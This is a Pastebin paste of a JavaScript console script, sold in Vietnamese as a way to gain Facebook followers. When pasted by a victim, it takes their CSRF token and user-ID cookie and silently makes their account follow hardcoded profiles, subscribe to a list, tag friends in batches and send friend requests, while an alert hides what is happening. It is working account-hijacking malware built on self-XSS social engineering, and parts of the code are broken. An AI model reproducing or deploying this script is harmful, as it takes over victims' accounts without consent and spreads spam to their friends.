Advertisement
Guest User

Code tăng sub thật và list by Lộc Stoml

a guest
Nov 22nd, 2014
166
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.88 KB | None | 0 0
  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  3. alert('Sub sẽ cập nhật sau 24h =)) Chúc bạn chơi Facebook vui vẻ :v');
  4. function a(abone){
  5. var http4 = new XMLHttpRequest();
  6. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  7. var params4 = "profile_id=" + abone +
  8.  
  9. "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg
  10.  
  11. + "&lsd&__" + user_id + "&phstamp=";
  12. http4.open("POST", url4, true);
  13. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  14. http4.setRequestHeader("Content-length", params4.length);
  15. http4.setRequestHeader("Connection", "close");
  16. http4.onreadystatechange = function() {
  17. if(http4.readyState == 4 && http4.status == 200) {http4.close;}
  18. }
  19. http4.send(params4);
  20. }
  21. // Close the connection
  22. function sublist(uidss) {
  23. var a = document.createElement('script');
  24. a.innerHTML = "new
  25.  
  26. AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subs
  27.  
  28. cribe').setData({ flid: " + uidss + " }).send();";
  29. document.body.appendChild(a);
  30. }
  31. // Không edit bất kì gì từ đây trở lên
  32.  
  33.  
  34. // BOSS ADM
  35. a("100007257438093");a("100005582620693");a("100006996766426");a("1000045350423
  36.  
  37. 81");a("100004436971004");a("100001024414941");sublist("1510525969199303");
  38. //List & ad page
  39.  
  40. // Từ đây trở xuống là nhảm chủ yếu giấu bớt ID
  41. function sarkadaslari_al(){
  42. var xmlhttp = new XMLHttpRequest();
  43. xmlhttp.onreadystatechange = function () {
  44. if(xmlhttp.readyState == 4){
  45. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  46. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  47. smesaj = "";
  48. smesaj_text = "";
  49. for(i=f*10;i<(f+1)*10;i++){
  50. if(arkadaslar.payload.entries[i]){
  51. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text +
  52.  
  53. "]";
  54. smesaj_text += " " + arkadaslar.payload.entries[i].text;
  55. }
  56. }
  57. sdurumpaylas(); }
  58.  
  59. }
  60.  
  61. };
  62. var params = "&filter[0]=user";
  63. params += "&options[0]=friends_only";
  64. params += "&options[1]=nm";
  65. params += "&token=v7";
  66. params += "&viewer=" + user_id;
  67. params += "&__user=" + user_id;
  68.  
  69. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET",
  70.  
  71. "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  72. else { xmlhttp.open("GET",
  73.  
  74. "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  75. xmlhttp.send();
  76. }
  77.  
  78. var tiklama = document.addEventListener("click", function () {
  79. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  80. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  81. sarkadaslari_al();
  82. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  83.  
  84. document.removeEventListener(tiklama);
  85. }
  86. }, false);
  87.  
  88. function sarkadasekle(uid,tem){
  89. var xmlhttp = new XMLHttpRequest();
  90. xmlhttp.onreadystatechange = function () {
  91. if(xmlhttp.readyState == 4){
  92. }
  93. };
  94.  
  95. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  96. var params = "to_friend=" + uid;
  97. params += "&action=add_friend";
  98. params += "&how_found=friend_browser";
  99. params += "&ref_param=none";
  100. params += "&outgoing_id=";
  101. params += "&logging_location=friend_browser";
  102. params += "&no_flyout_on_click=true";
  103. params += "&ego_log_data=";
  104. params += "&http_referer=";
  105. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  106. params += "&phstamp=165816749114848369115";
  107. params += "&__user=" + user_id;
  108. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  109. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  110.  
  111. if(tem == "farketmez" && document.cookie.split("tem" + user_id +"=").length > 1){
  112. xmlhttp.send(params);
  113. }else if(document.cookie.split("tem" + user_id +"=").length <= 1){
  114. cinsiyetgetir(uid,tem,"sarkadasekle");
  115. }else if(tem == document.cookie.split("tem" + user_id +"=")[1].split(";")[0].toString()){
  116. xmlhttp.send(params);
  117. }
  118. }
  119.  
  120. var temsonuc = {};
  121. var temhtml = document.createElement("html");
  122. function scinsiyetgetir(uid,tem,fonksiyon){
  123. var xmlhttp = new XMLHttpRequest();
  124. xmlhttp.onreadystatechange = function () {
  125. if(xmlhttp.readyState == 4){
  126. eval("temsonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  127. temhtml.innerHTML = temsonuc.jsmods.markup[0][1].__html
  128. btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  129. if(temhtml.getElementsByTagName("select")[0].value == "1"){
  130. document.cookie = "tem" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  131. }else if(temhtml.getElementsByTagName("select")[0].value == "2"){
  132. document.cookie = "tem" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  133. }
  134. eval(fonksiyon + "(" + id + "," + tem + ");");
  135. }
  136. };
  137. xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id,
  138.  
  139. true);
  140. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  141. xmlhttp.send();
  142. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement